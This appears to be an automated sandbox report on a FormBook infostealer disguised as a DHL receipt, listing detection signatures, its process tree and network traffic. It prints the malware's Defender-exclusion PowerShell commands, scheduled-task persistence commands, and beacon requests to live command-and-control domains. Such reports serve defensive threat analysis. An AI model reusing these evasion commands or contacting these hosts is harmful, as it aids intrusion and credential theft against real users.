
Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name: DHL AWB Receipt_pdf.bat.exe
Analysis ID: 1629832
MD5: c954a4b03c33a981a0c82533f4a9e917
SHA1: a8a3dabbc07ca6b2213167ee3b95f132b98b3b58
SHA256: 6531397d4b6e69128ea61f5e607f7be5c1fe0564a3676268e086e51e2806de9d
Tags: bat, DHL, exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL AWB Receipt_pdf.bat.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C954A4B03C33A981A0C82533F4A9E917)
    • powershell.exe (PID: 3060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7180 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • CLaoxM16clnn.exe (PID: 3612 cmdline: "C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\P4d0Bp9O.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 7924 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • CLaoxM16clnn.exe (PID: 5232 cmdline: "C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\lKia7vJCslSoN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 8136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • AYBPplggzXaXav.exe (PID: 7396 cmdline: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe MD5: C954A4B03C33A981A0C82533F4A9E917)
    • schtasks.exe (PID: 7760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Unpacked PE files (Source, Rule, Description, Author, Strings):
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe, ParentImage: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe, ParentProcessId: 7396, ParentProcessName: AYBPplggzXaXav.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp", ProcessId: 7760, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", ProcessId: 7180, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 3060, ProcessName: powershell.exe

                Persistence and Installation Behavior

                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3220, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp", ProcessId: 7180, ProcessName: schtasks.exe
                No Suricata rule has matched



                AV Detection

Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe, ReversingLabs: Detection: 42%
Source: DHL AWB Receipt_pdf.bat.exe, Virustotal: Detection: 54%
Source: DHL AWB Receipt_pdf.bat.exe, ReversingLabs: Detection: 42%
Source: Yara match, File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL AWB Receipt_pdf.bat.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DHL AWB Receipt_pdf.bat.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: JifX.pdb source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: JifX.pdbSHA256c source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CLaoxM16clnn.exe, 00000012.00000000.1922490796.000000000064F000.00000002.00000001.01000000.0000000D.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2066595706.000000000064F000.00000002.00000001.01000000.0000000D.sdmp

                Networking

                Source: DNS query: www.031233435.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.multo.xyz
                Source: DNS query: www.usastakes.xyz
Source: Joe Sandbox View, IP Address: 144.76.229.203
Source: Joe Sandbox View, IP Address: 23.29.115.2
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
Source: global traffic, HTTP traffic detected:
    GET /wuv4/?NX1=2OIhpue752EZ90/Jy4OxJmXTvJVBgAPVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCTNG9mwD0i4+P4pyvszZmf8O6naOAWouwNw4=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.loonerverse.app
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /esw3/?NX1=STIHOi9CYFClakjUlEd88Hg71sRPIlHg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjRWN3JEsIIp4+Lk93ivaQ3wRGKSmERjLyylY=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.primepath.net
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /frae/?NX1=KcpF0TU1XcHay6iKIgUxHwJBag7K5Rp8isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kks1mZN5Rw1IHph1hFA1oAtKX7qbyGh9Efm8A=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.031233435.xyz
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /19my/?NX1=joqcG+fZarPVQJ7TjIZXuruwpJYmUIAtjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwdPne9PHFThd6AUssI6eq1RRxJddXIyJW2Mw=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.quo1ybjmkhdqljoz.top
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /lp5v/?NX1=7yIrJbTkKXcZ3P0Lbb/spbunlPs5ol0HVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2HkhnrZp1ClYlXmvo9VRgUmZgBahPRESa7mQ=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.publicblockchain.xyz
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /piuf/?NX1=YCNZp8d5iXit/W0B1bW8XejC8zl3xaJp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURs2IOPUK2dXL3xdhHfQhvmtooQIjipHkpPlE=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.multo.xyz
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /ty1w/?dVC=cRpHHbL8w&NX1=DmU+BbsPdbeZ2otgmuqzGLQugMuTtu9/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DIBTEdHWXn0U/2uWCjCXjHjQfGNNmXy/2oB8= HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.tkloqr.info
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /acnz/?NX1=4AOqIRL3pTX0nNGjjVOpTiKt19HhLJBNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmnyI0/drZ3hMyaL9fBH0Z6Xy5J/X6Z9f5Zvc=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.streaay.live
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /qnz1/?dVC=cRpHHbL8w&NX1=R+Oteo3rh3f7nhB39ii3M5Z93IdAkzgqallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvWuZ5F0pebRTMAKK48iU+Sr/MG8LNpjaOKCc= HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.77zhibo.net
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /bio5/?NX1=7nMcQ+p/VAEQ2azR1rftKXgvVAA48fsnkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH4uGIRvQaV8QFqEOJGGvXq7C1+/v4pj4qJdc=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.thefounder.ceo
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /2dxw/?NX1=53Ecfr8B68ed/BlhjMNZMhOAyCUiFgtXzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDxdw1mEZBLSWyb+kzDCV7nDGH4eKPYFUfhXQ=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.rbopisalive.cyou
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /j7xf/?NX1=EoO1UT5Wd2PGx3Mw+6+CyE09Q8dDTjZjjQBsBAQWNKytFXrnqux0YvA75VbZy52yQ1EBW1TgMDX5nQfvFmbNK4hUQQvIOcKyXaxp8NHr2eSXhQvy/sW4Iq4=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.spacewalker.app
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /5o3b/?NX1=aMDQ2zlSfVAnRg1NG0Nyyzi6AeOTYb1wQ1hE+7gf/URoUExZouIubEid9yVe9hJJbXBuu3jvryMBZzKz5ikAUWo2jMMmhnfjZsiLKrJCzPvIjrCxjxnzadw=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.ufin89.biz
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected:
    GET /ugkq/?NX1=2IPNaPUBIEKLMYesi4AZuw9Rok9D8k31Sq4y45D8jA04/h+slag64ifzswuCNybk3ABolq+6ms7eRJi+n4lhIXVNvQbvyHnA8wFZjZxFLnDVqZQunkENuSk=&dVC=cRpHHbL8w HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Host: www.usastakes.xyz
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.loonerverse.app
Source: global traffic, DNS traffic detected: DNS query: www.primepath.net
Source: global traffic, DNS traffic detected: DNS query: www.031233435.xyz
Source: global traffic, DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic, DNS traffic detected: DNS query: www.publicblockchain.xyz
Source: global traffic, DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic, DNS traffic detected: DNS query: www.tkloqr.info
Source: global traffic, DNS traffic detected: DNS query: www.streaay.live
Source: global traffic, DNS traffic detected: DNS query: www.77zhibo.net
Source: global traffic, DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic, DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic, DNS traffic detected: DNS query: www.spacewalker.app
Source: global traffic, DNS traffic detected: DNS query: www.ufin89.biz
Source: global traffic, DNS traffic detected: DNS query: www.usastakes.xyz
Source: global traffic, DNS traffic detected: DNS query: www.ppistealid.cyou
Source: unknown, HTTP traffic detected:
    POST /esw3/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cache-Control: max-age=0
    Content-Length: 200
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Host: www.primepath.net
    Origin: http://www.primepath.net
    Referer: http://www.primepath.net/esw3/
    User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
